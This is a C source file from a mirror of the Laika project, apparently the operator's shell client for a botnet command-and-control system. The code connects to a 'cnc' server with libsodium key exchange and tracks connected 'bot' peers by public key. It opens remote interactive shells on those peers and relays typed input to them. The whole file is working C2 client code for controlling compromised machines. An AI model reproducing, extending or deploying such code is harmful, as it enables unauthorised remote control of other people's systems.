mirror of https://github.com/CPunch/Laika.git
450 lines
14 KiB
C
450 lines
14 KiB
C
#include "sclient.h"
|
|
|
|
#include "core/lerror.h"
|
|
#include "core/lmem.h"
|
|
#include "core/lsodium.h"
|
|
#include "net/lpacket.h"
|
|
#include "sterm.h"
|
|
|
|
void shell_pingTask(struct sLaika_taskService *service, struct sLaika_task *task, clock_t currTick,
|
|
void *uData)
|
|
{
|
|
tShell_client *client = (tShell_client *)uData;
|
|
|
|
laikaS_emptyOutPacket(client->peer, LAIKAPKT_PINGPONG);
|
|
}
|
|
|
|
/* ======================================[[ PeerHashMap ]]====================================== */
|
|
|
|
typedef struct sShell_hashMapElem
|
|
{
|
|
int id;
|
|
tShell_peer *peer;
|
|
uint8_t *pub;
|
|
} tShell_hashMapElem;
|
|
|
|
int shell_ElemCompare(const void *a, const void *b, void *udata)
|
|
{
|
|
const tShell_hashMapElem *ua = a;
|
|
const tShell_hashMapElem *ub = b;
|
|
|
|
return memcmp(ua->pub, ub->pub, crypto_kx_PUBLICKEYBYTES);
|
|
}
|
|
|
|
uint64_t shell_ElemHash(const void *item, uint64_t seed0, uint64_t seed1)
|
|
{
|
|
const tShell_hashMapElem *u = item;
|
|
return *(uint64_t *)(u->pub); /* hashes pub key (first 8 bytes) */
|
|
}
|
|
|
|
/* ====================================[[ Packet Handlers ]]==================================== */
|
|
|
|
void shellC_handleHandshakeRes(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData)
|
|
{
|
|
uint8_t saltBuf[LAIKA_HANDSHAKE_SALT_LEN];
|
|
uint8_t endianness = laikaS_readByte(&peer->sock);
|
|
laikaS_read(&peer->sock, saltBuf, LAIKA_HANDSHAKE_SALT_LEN);
|
|
|
|
peer->sock.flipEndian = endianness != laikaM_isBigEndian();
|
|
|
|
/* set peer salt */
|
|
laikaS_setSalt(peer, saltBuf);
|
|
|
|
/* send PEER_LOGIN packet */
|
|
laikaS_startOutPacket(peer, LAIKAPKT_PEER_LOGIN_REQ);
|
|
laikaS_writeByte(&peer->sock, PEER_AUTH);
|
|
laikaS_write(&peer->sock, saltBuf, LAIKA_HANDSHAKE_SALT_LEN);
|
|
laikaS_endOutPacket(peer);
|
|
|
|
PRINTSUCC("Handshake accepted!\n");
|
|
}
|
|
|
|
void shellC_handlePing(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData)
|
|
{
|
|
LAIKA_DEBUG("got ping from cnc!\n");
|
|
/* stubbed */
|
|
}
|
|
|
|
void shellC_handleAddPeer(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData)
|
|
{
|
|
char hostname[LAIKA_HOSTNAME_LEN], inet[LAIKA_INET_LEN], ipStr[LAIKA_IPSTR_LEN];
|
|
uint8_t pubKey[crypto_kx_PUBLICKEYBYTES];
|
|
tShell_client *client = (tShell_client *)uData;
|
|
tShell_peer *bot;
|
|
uint8_t type, osType;
|
|
|
|
/* read newly connected peer's pubKey */
|
|
laikaS_read(&peer->sock, pubKey, crypto_kx_PUBLICKEYBYTES);
|
|
|
|
/* read hostname & ip str */
|
|
laikaS_read(&peer->sock, hostname, LAIKA_HOSTNAME_LEN);
|
|
laikaS_read(&peer->sock, inet, LAIKA_INET_LEN);
|
|
laikaS_read(&peer->sock, ipStr, LAIKA_IPSTR_LEN);
|
|
|
|
/* read peer's peerType & osType */
|
|
type = laikaS_readByte(&peer->sock);
|
|
osType = laikaS_readByte(&peer->sock);
|
|
|
|
/* ignore panel clients */
|
|
if (type == PEER_AUTH)
|
|
return;
|
|
|
|
/* create peer */
|
|
bot = shellP_newPeer(type, osType, pubKey, hostname, inet, ipStr);
|
|
|
|
/* add peer to client */
|
|
shellC_addPeer(client, bot);
|
|
}
|
|
|
|
void shellC_handleRmvPeer(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData)
|
|
{
|
|
uint8_t pubKey[crypto_kx_PUBLICKEYBYTES];
|
|
tShell_client *client = (tShell_client *)uData;
|
|
tShell_peer *bot;
|
|
uint8_t type;
|
|
int id;
|
|
|
|
/* read public key & type */
|
|
laikaS_read(&peer->sock, pubKey, crypto_kx_PUBLICKEYBYTES);
|
|
type = laikaS_readByte(&peer->sock);
|
|
|
|
/* ignore panel clients */
|
|
if (type == PEER_AUTH)
|
|
return;
|
|
|
|
if ((bot = shellC_getPeerByPub(client, pubKey, &id)) == NULL)
|
|
LAIKA_ERROR("LAIKAPKT_AUTHENTICATED_RMV_PEER_RES: Unknown peer!\n");
|
|
|
|
/* remove peer */
|
|
shellC_rmvPeer(client, bot, id);
|
|
}
|
|
|
|
void shellC_handleShellOpen(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData)
|
|
{
|
|
/* stubbed! this packet is a no-op currently */
|
|
}
|
|
|
|
void shellC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData)
|
|
{
|
|
uint8_t buf[LAIKA_SHELL_DATA_MAX_LENGTH];
|
|
tShell_client *client = (tShell_client *)uData;
|
|
uint32_t id;
|
|
|
|
/* ignore packet if malformed */
|
|
if (sz - sizeof(uint32_t) > LAIKA_SHELL_DATA_MAX_LENGTH)
|
|
return;
|
|
|
|
id = laikaS_readu32(&peer->sock); /* this is ignored for now */
|
|
sz -= sizeof(uint32_t);
|
|
|
|
/* sanity check */
|
|
if (!shellC_isShellOpen(client))
|
|
LAIKA_ERROR("LAIKAPKT_SHELL_DATA: No shell open!\n");
|
|
|
|
laikaS_read(&peer->sock, buf, sz);
|
|
shellT_writeRawOutput(buf, sz);
|
|
}
|
|
|
|
void shellC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData)
|
|
{
|
|
tShell_client *client = (tShell_client *)uData;
|
|
uint32_t id;
|
|
|
|
id = laikaS_readu32(&peer->sock); /* this is ignored for now */
|
|
|
|
/* sanity check */
|
|
if (!shellC_isShellOpen(client))
|
|
return; /* ignore invalid CLOSE packets */
|
|
|
|
/* close shell */
|
|
shellC_closeShell(client);
|
|
}
|
|
|
|
/* =====================================[[ Packet Table ]]====================================== */
|
|
|
|
/* clang-format off */
|
|
|
|
struct sLaika_peerPacketInfo shellC_pktTbl[LAIKAPKT_MAXNONE] = {
|
|
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_HANDSHAKE_RES,
|
|
shellC_handleHandshakeRes,
|
|
sizeof(uint8_t) + LAIKA_HANDSHAKE_SALT_LEN,
|
|
false),
|
|
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_PINGPONG,
|
|
shellC_handlePing,
|
|
0,
|
|
false),
|
|
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_AUTHENTICATED_ADD_PEER_RES,
|
|
shellC_handleAddPeer,
|
|
crypto_kx_PUBLICKEYBYTES + LAIKA_HOSTNAME_LEN + LAIKA_INET_LEN + LAIKA_IPSTR_LEN + sizeof(uint8_t) + sizeof(uint8_t),
|
|
false),
|
|
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_AUTHENTICATED_RMV_PEER_RES,
|
|
shellC_handleRmvPeer,
|
|
crypto_kx_PUBLICKEYBYTES + sizeof(uint8_t),
|
|
false),
|
|
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_OPEN,
|
|
shellC_handleShellOpen,
|
|
sizeof(uint32_t) + sizeof(uint16_t) + sizeof(uint16_t),
|
|
false),
|
|
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_CLOSE,
|
|
shellC_handleShellClose,
|
|
sizeof(uint32_t),
|
|
false),
|
|
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_DATA,
|
|
shellC_handleShellData,
|
|
sizeof(uint32_t), /* packet must be bigger than this */
|
|
true)
|
|
};
|
|
|
|
/* clang-format on */
|
|
|
|
/* socket event */
|
|
void shellC_onPollFail(struct sLaika_socket *sock, void *uData)
|
|
{
|
|
struct sLaika_peer *peer = (struct sLaika_peer *)sock;
|
|
struct sShell_client *client = (struct sShell_client *)uData;
|
|
|
|
laikaS_kill(&client->peer->sock);
|
|
}
|
|
|
|
/* ======================================[[ Client API ]]======================================= */
|
|
|
|
void shellC_init(tShell_client *client)
|
|
{
|
|
laikaP_initPList(&client->pList);
|
|
client->peer = laikaS_newPeer(shellC_pktTbl, &client->pList, shellC_onPollFail, (void *)client,
|
|
(void *)client);
|
|
|
|
client->peers = hashmap_new(sizeof(tShell_hashMapElem), 8, 0, 0, shell_ElemHash,
|
|
shell_ElemCompare, NULL, NULL);
|
|
client->openShell = NULL;
|
|
laikaM_initVector(client->peerTbl, 4);
|
|
|
|
laikaT_initTaskService(&client->tService);
|
|
laikaT_newTask(&client->tService, LAIKA_PING_INTERVAL, shell_pingTask, client);
|
|
|
|
/* load authenticated keypair */
|
|
if (sodium_init() < 0) {
|
|
shellC_cleanup(client);
|
|
LAIKA_ERROR("LibSodium failed to initialize!\n");
|
|
}
|
|
|
|
/* by default use random key */
|
|
if (!laikaK_genKeys(client->pub, client->priv)) {
|
|
shellC_cleanup(client);
|
|
LAIKA_ERROR("Failed to init keypair!\n");
|
|
}
|
|
|
|
/* read cnc's public key into peerPub */
|
|
if (!laikaK_loadKeys(client->peer->peerPub, NULL, LAIKA_PUBKEY, NULL)) {
|
|
shellC_cleanup(client);
|
|
LAIKA_ERROR("Failed to init cnc public key!\n");
|
|
}
|
|
}
|
|
|
|
void shellC_cleanup(tShell_client *client)
|
|
{
|
|
int i;
|
|
|
|
laikaS_freePeer(client->peer);
|
|
laikaP_cleanPList(&client->pList);
|
|
hashmap_free(client->peers);
|
|
|
|
laikaT_cleanTaskService(&client->tService);
|
|
|
|
/* free peers */
|
|
for (i = 0; i < laikaM_countVector(client->peerTbl); i++) {
|
|
if (client->peerTbl[i])
|
|
shellP_freePeer(client->peerTbl[i]);
|
|
}
|
|
laikaM_free(client->peerTbl);
|
|
}
|
|
|
|
void shellC_connectToCNC(tShell_client *client, char *ip, char *port)
|
|
{
|
|
struct sLaika_socket *sock = &client->peer->sock;
|
|
|
|
PRINTINFO("Connecting to %s:%s...\n", ip, port);
|
|
|
|
/* create encryption keys */
|
|
if (crypto_kx_client_session_keys(client->peer->inKey, client->peer->outKey, client->pub,
|
|
client->priv, client->peer->peerPub) != 0)
|
|
LAIKA_ERROR("failed to gen session key!\n");
|
|
|
|
/* setup socket */
|
|
laikaS_connect(sock, ip, port);
|
|
laikaS_setNonBlock(sock);
|
|
laikaP_addSock(&client->pList, sock);
|
|
|
|
/* queue handshake request */
|
|
laikaS_startOutPacket(client->peer, LAIKAPKT_HANDSHAKE_REQ);
|
|
laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN);
|
|
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
|
|
laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
|
|
laikaS_writeByte(sock, LAIKA_OSTYPE);
|
|
laikaS_write(sock, client->pub, sizeof(client->pub)); /* write public key */
|
|
|
|
/* write stub hostname & ip str (since we're a panel/dummy client, cnc doesn't need this
|
|
* information really) */
|
|
laikaS_zeroWrite(sock, LAIKA_HOSTNAME_LEN);
|
|
laikaS_zeroWrite(sock, LAIKA_INET_LEN);
|
|
laikaS_endOutPacket(client->peer);
|
|
laikaS_setSecure(client->peer, true); /* after our handshake, all packet bodies are encrypted */
|
|
|
|
/* the handshake request will be sent on the next call to shellC_poll */
|
|
}
|
|
|
|
bool shellC_poll(tShell_client *client, int timeout)
|
|
{
|
|
struct sLaika_pollEvent *evnts;
|
|
int numEvents, i;
|
|
|
|
/* run any scheduled tasks, this could be moved but it works fine here for now */
|
|
laikaT_pollTasks(&client->tService);
|
|
|
|
/* flush any events prior (eg. made by a command handler or task) */
|
|
laikaP_flushOutQueue(&client->pList);
|
|
evnts = laikaP_poll(&client->pList, timeout, &numEvents);
|
|
|
|
if (numEvents == 0) /* no events? timeout was reached */
|
|
return false;
|
|
|
|
for (i = 0; i < numEvents; i++) {
|
|
laikaP_handleEvent(&evnts[i]);
|
|
}
|
|
|
|
/* flush any events after (eg. made by a packet handler) */
|
|
laikaP_flushOutQueue(&client->pList);
|
|
return true;
|
|
}
|
|
|
|
void shellC_loadKeys(tShell_client *client, const char *pub, const char *priv)
|
|
{
|
|
if (!laikaK_loadKeys(pub ? client->pub : NULL, priv ? client->priv : NULL, pub, priv)) {
|
|
shellC_cleanup(client);
|
|
LAIKA_ERROR("Failed to init keypair!\n");
|
|
}
|
|
}
|
|
|
|
tShell_peer *shellC_getPeerByPub(tShell_client *client, uint8_t *pub, int *id)
|
|
{
|
|
tShell_hashMapElem *elem =
|
|
(tShell_hashMapElem *)hashmap_get(client->peers, &(tShell_hashMapElem){.pub = pub});
|
|
|
|
/* return peer if elem was found, otherwise return NULL */
|
|
if (elem) {
|
|
*id = elem->id;
|
|
return elem->peer;
|
|
} else {
|
|
*id = -1;
|
|
return NULL;
|
|
}
|
|
}
|
|
|
|
int shellC_addPeer(tShell_client *client, tShell_peer *newPeer)
|
|
{
|
|
/* find empty ID */
|
|
int id;
|
|
for (id = 0; id < laikaM_countVector(client->peerTbl); id++) {
|
|
if (client->peerTbl[id] == NULL) /* it's empty! */
|
|
break;
|
|
}
|
|
|
|
/* if we didn't find an empty id, grow the array (ID is already set to the correct index) */
|
|
if (id == laikaM_countVector(client->peerTbl)) {
|
|
laikaM_growVector(tShell_peer *, client->peerTbl, 1);
|
|
laikaM_countVector(client->peerTbl)++;
|
|
}
|
|
|
|
/* add to peer lookup table */
|
|
client->peerTbl[id] = newPeer;
|
|
|
|
/* insert into hashmap */
|
|
hashmap_set(client->peers,
|
|
&(tShell_hashMapElem){.id = id, .pub = newPeer->pub, .peer = newPeer});
|
|
|
|
/* let user know */
|
|
if (!shellC_isShellOpen(client)) {
|
|
PRINTSUCC("Peer %04d connected\n", id)
|
|
}
|
|
|
|
return id;
|
|
}
|
|
|
|
void shellC_rmvPeer(tShell_client *client, tShell_peer *oldPeer, int id)
|
|
{
|
|
/* remove from bot tbl */
|
|
client->peerTbl[id] = NULL;
|
|
|
|
/* remove peer from hashmap */
|
|
hashmap_delete(client->peers, &(tShell_hashMapElem){.pub = oldPeer->pub, .peer = oldPeer});
|
|
|
|
/* tell user */
|
|
if (!shellC_isShellOpen(client)) {
|
|
PRINTINFO("Peer %04d disconnected\n", id)
|
|
}
|
|
|
|
/* finally, free peer */
|
|
shellP_freePeer(oldPeer);
|
|
}
|
|
|
|
void shellC_openShell(tShell_client *client, tShell_peer *peer, uint16_t col, uint16_t row)
|
|
{
|
|
/* check if we already have a shell open */
|
|
if (client->openShell)
|
|
return;
|
|
|
|
/* send SHELL_OPEN request */
|
|
laikaS_startOutPacket(client->peer, LAIKAPKT_AUTHENTICATED_SHELL_OPEN_REQ);
|
|
laikaS_write(&client->peer->sock, peer->pub, sizeof(peer->pub));
|
|
laikaS_writeu16(&client->peer->sock, col);
|
|
laikaS_writeu16(&client->peer->sock, row);
|
|
laikaS_endOutPacket(client->peer);
|
|
client->openShell = peer;
|
|
}
|
|
|
|
void shellC_closeShell(tShell_client *client)
|
|
{
|
|
uint32_t id = 0; /* we will *ALWAYS* only have one shell open */
|
|
/* check if we have a shell open */
|
|
if (!shellC_isShellOpen(client))
|
|
return;
|
|
|
|
/* send SHELL_CLOSE request */
|
|
laikaS_startOutPacket(client->peer, LAIKAPKT_SHELL_CLOSE);
|
|
laikaS_writeu32(&client->peer->sock, id);
|
|
laikaS_endOutPacket(client->peer);
|
|
|
|
client->openShell = NULL;
|
|
}
|
|
|
|
void shellC_sendDataShell(tShell_client *client, uint8_t *data, size_t sz)
|
|
{
|
|
uint32_t i, id = 0; /* we will *ALWAYS* only have one shell open */
|
|
struct sLaika_socket *sock = &client->peer->sock;
|
|
/* check if we have a shell open */
|
|
if (!shellC_isShellOpen(client))
|
|
return;
|
|
|
|
laikaS_startVarPacket(client->peer, LAIKAPKT_SHELL_DATA);
|
|
laikaS_writeu32(sock, id);
|
|
switch (client->openShell->osType) {
|
|
case LAIKA_OSTYPE: /* if we're the same as the target OS, line endings don't need to be
|
|
converted! */
|
|
laikaS_write(sock, data, sz);
|
|
break;
|
|
default:
|
|
/* line endings have to be converted (ALWAYS LINUX->WIN for now) */
|
|
for (i = 0; i < sz; i++) {
|
|
if (data[i] == '\n') {
|
|
/* convert to windows line endings */
|
|
laikaS_writeByte(sock, '\r');
|
|
laikaS_writeByte(sock, '\n');
|
|
} else {
|
|
laikaS_writeByte(sock, data[i]);
|
|
}
|
|
}
|
|
break;
|
|
}
|
|
laikaS_endVarPacket(client->peer);
|
|
}
|